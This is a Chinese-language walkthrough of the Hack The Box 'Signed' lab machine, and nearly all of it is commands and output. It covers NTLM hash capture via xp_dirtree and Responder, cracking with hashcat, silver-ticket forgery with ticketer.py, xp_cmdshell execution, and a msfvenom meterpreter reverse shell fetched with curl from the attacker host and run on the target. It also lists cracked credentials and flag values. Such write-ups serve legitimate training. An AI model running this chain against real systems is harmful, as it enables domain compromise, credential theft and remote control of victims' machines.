User Flag nmap 只扫到一个 mssql
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 PORT STATE SERVICE REASON VERSION 1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 16.00.1000.00 | ms-sql-ntlm-info: | Target_Name: SIGNED | NetBIOS_Domain_Name: SIGNED | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: SIGNED.HTB | DNS_Computer_Name: DC01.SIGNED.HTB | DNS_Tree_Name: SIGNED.HTB |_ Product_Version: 10.0.17763 Host script results: |_clock-skew: mean: -14s, deviation: 0s, median: -14s | ms-sql-info: | 10.10.11.90:1433: | Version: | name: Microsoft SQL Server | number: 16.00.1000.00 | Product: Microsoft SQL Server |_ TCP port: 1433
爆破服务账户 NTLMv2 Hash mssql 连接后没枚举到有用的,尝试爆破一下 NTLMv2 Hash
1 2 3 $ mssqlclient.py scott:'Sm230#C5NatH' @10.10.11.90 SQL (scott guest@master)> xp_dirtree \\10.10.16.8\aa
responder
1 2 3 4 5 responder -I tun0 [SMB] NTLMv2-SSP Client : 10.10.11.90 [SMB] NTLMv2-SSP Username : SIGNED\mssqlsvc [SMB] NTLMv2-SSP Hash : mssqlsvc::SIGNED:4d6bf6cb6850bfc3:BE31C2F9E6A51A64929B487B21D5F76F:010100000000000080973E28DA3CDC01B33B5D065F0D6096000000000200080036004C004700300001001E00570049004E002D005800540049003200460046004E004C0037004F00340004003400570049004E002D005800540049003200460046004E004C0037004F0034002E0036004C00470030002E004C004F00430041004C000300140036004C00470030002E004C004F00430041004C000500140036004C00470030002E004C004F00430041004C000700080080973E28DA3CDC0106000400020000000800300030000000000000000000000000300000E9CC67A8CDE177E34715C3E8ACDB744288ED7D2634A916315E65723ACE8336430A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0038000000000000000000
爆破得到凭证 mssqlsvc:purPLE9795!@
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 $ echo mssqlsvc::SIGNED:4d6bf6cb6850bfc3:BE31C2F9E6A51A64929B487B21D5F76F:010100000000000080973E28DA3CDC01B33B5D065F0D6096000000000200080036004C0047003 00001001E00570049004E002D005800540049003200460046004E004C0037004F00340004003400570049004E002D005800540049003200460046004E004C0037004F0034002E0036004C00470030002E004C004F00430 041004C000300140036004C00470030002E004C004F00430041004C000500140036004C00470030002E004C004F00430041004C000700080080973E28DA3CDC01060004000200000008003000300000000000000000000 00000300000E9CC67A8CDE177E34715C3E8ACDB744288ED7D2634A916315E65723ACE8336430A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E003100360 02E0038000000000000000000 > hash.txt $ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 MSSQLSVC::SIGNED:4d6bf6cb6850bfc3:be31c2f9e6a51a64929b487b21d5f76f:010100000000000080973e28da3cdc01b33b5d065f0d6096000000000200080036004c004700300001001e00570049004e002d005800540049003200460046004e004c0037004f00340004003400570049004e002d005800540049003200460046004e004c0037004f0034002e0036004c00470030002e004c004f00430041004c000300140036004c00470030002e004c004f00430041004c000500140036004c00470030002e004c004f00430041004c000700080080973e28da3cdc0106000400020000000800300030000000000000000000000000300000e9cc67a8cde177e34715c3e8acdb744288ed7d2634a916315e65723ace8336430a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:purPLE9795!@ Session..........: hashcat Status...........: Cracked Hash.Mode........: 5600 (NetNTLMv2) Hash.Target......: MSSQLSVC::SIGNED:4d6bf6cb6850bfc3:be31c2f9e6a51a649...000000 Time.Started.....: Tue Oct 14 17:04:36 2025 (1 sec) Time.Estimated...: Tue Oct 14 17:04:37 2025 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 4452.2 kH/s (1.11ms) @ Accel:512 Loops:1 Thr:1 Vec:16 Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) Progress.........: 4489216/14344385 (31.30%) Rejected.........: 0/4489216 (0.00%) Restore.Point....: 4472832/14344385 (31.18%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: pwood8 -> punong
用 mssqlsvc 登录
1 mssqlclient.py mssqlsvc:'purPLE9795!@' @10.10.11.90 -windows-auth
枚举 login 发现 SIGNED\IT 组被设为了 sysadmin,但是当前 login 还是没有 sysadmin 权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 SQL (SIGNED\mssqlsvc guest@master)> enum_logins name type_desc is_disabled sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin --------------------------------- ------------- ----------- -------- ------------- ----------- ---------- ------------ --------- --------- --------- sa SQL_LOGIN 0 1 0 0 0 0 0 0 0 ##MS_PolicyEventProcessingLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0 ##MS_PolicyTsqlExecutionLogin## SQL_LOGIN 1 0 0 0 0 0 0 0 0 SIGNED\IT WINDOWS_GROUP 0 1 0 0 0 0 0 0 0 NT SERVICE\SQLWriter WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0 NT SERVICE\Winmgmt WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0 NT SERVICE\MSSQLSERVER WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0 NT AUTHORITY\SYSTEM WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0 NT SERVICE\SQLSERVERAGENT WINDOWS_LOGIN 0 1 0 0 0 0 0 0 0 NT SERVICE\SQLTELEMETRY WINDOWS_LOGIN 0 0 0 0 0 0 0 0 0 scott SQL_LOGIN 0 0 0 0 0 0 0 0 0 SIGNED\Domain Users WINDOWS_GROUP 0 0 0 0 0 0 0 0 0
白银票据 考虑用白银票据提升到 SIGNED\IT 组的权限
先收集信息,得到域 SID 为 S-1-5-21-4088429403-1159899800-2753317549,SIGNED\mssqlsvc 的 RID 为 1103,SIGNED\IT 的 RID 为 1105
1 2 3 4 5 6 7 8 SQL (SIGNED\mssqlsvc guest@master )> SELECT SUSER_SID(); b'0105000000000005150000005b7bb0f398aa2245ad4a1ca44f040000' SQL (SIGNED\Administrator guest@master )> SELECT name, sid FROM sys.server_principals SIGNED\IT b'0105000000000005150000005b7bb0f398aa2245ad4a1ca451040000'
制作白银票据
1 2 3 4 5 6 7 $ echo -n "purPLE9795!@" | iconv -t utf-16le | openssl dgst -md4 -provider legacy -provider default MD4(stdin)= ef699384c3285c54128a3ee1ddb1a0cc $ ticketer.py -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain 'SIGNED.HTB' -spn 'MSSQLSvc/DC01.SIGNED.HTB:1433' -group 1105 administrator $ export KRB5CCNAME=administrator.ccache $ mssqlclient.py -k -no-pass SIGNED.HTB/administrator@dc01.signed.htb
获取 flag
1 2 3 4 SQL (SIGNED\Administrator dbo@master)> xp_cmdshell type c:\users\mssqlsvc\desktop\user.txt output -------------------------------- d4bc58d4d3038cf6b23d4ff31363191c
Root Flag 生成个马上传
1 2 3 4 5 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.8 LPORT=4444 -f exe -o met.exe SQL (SIGNED\Administrator dbo@master)> xp_cmdshell curl 10.10.16.8:8000/met.exe -o %temp%\l1nk.exe SQL (SIGNED\Administrator dbo@master)> xp_cmdshell %temp%\l1nk.exe
非预期 1 ticketer.py -nthash 'ef699384c3285c54128a3ee1ddb1a0cc' -domain-sid 'S-1-5-21-4088429403-1159899800-2753317549' -domain 'SIGNED.HTB' -spn 'MSSQLSvc/DC01.SIGNED.HTB:1433' -group 1105,512 -user-id 1103 administrator
读文件
1 2 3 4 SQL (SIGNED\mssqlsvc dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:/users/administrator/desktop/root.txt', SINGLE_CLOB) AS Contents BulkColumn --------------------------------------- b'f2c65328837e4bf21e4c171dad2b60d0\r\n'